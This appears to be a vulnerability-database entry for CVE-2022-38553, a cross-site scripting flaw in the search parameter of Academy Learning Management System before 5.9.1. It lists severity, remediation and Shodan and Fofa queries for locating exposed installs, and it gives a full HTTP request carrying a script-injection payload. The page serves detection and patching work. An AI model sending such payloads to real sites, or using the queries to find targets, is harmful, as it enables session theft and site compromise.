🔙 목록으로 돌아가기

CVE-2022-38553: Academy Learning Management System <5.9.1 - Cross-Site Scripting

TitleAcademy Learning Management System <5.9.1 - Cross-Site Scripting
Authoredoardottt
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability.
CVSS Score6.1
EPSS Score0.07869
CVE IDCVE-2022-38553
CWE IDCWE-79
Shodan Queryhttp.html:"study any topic, anytime"
Fofa Querybody="study any topic, anytime"
Tags cve2022 cve academylms xss creativeitem vuln

🔍 Vulnerability Description

Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38553.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-38553.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A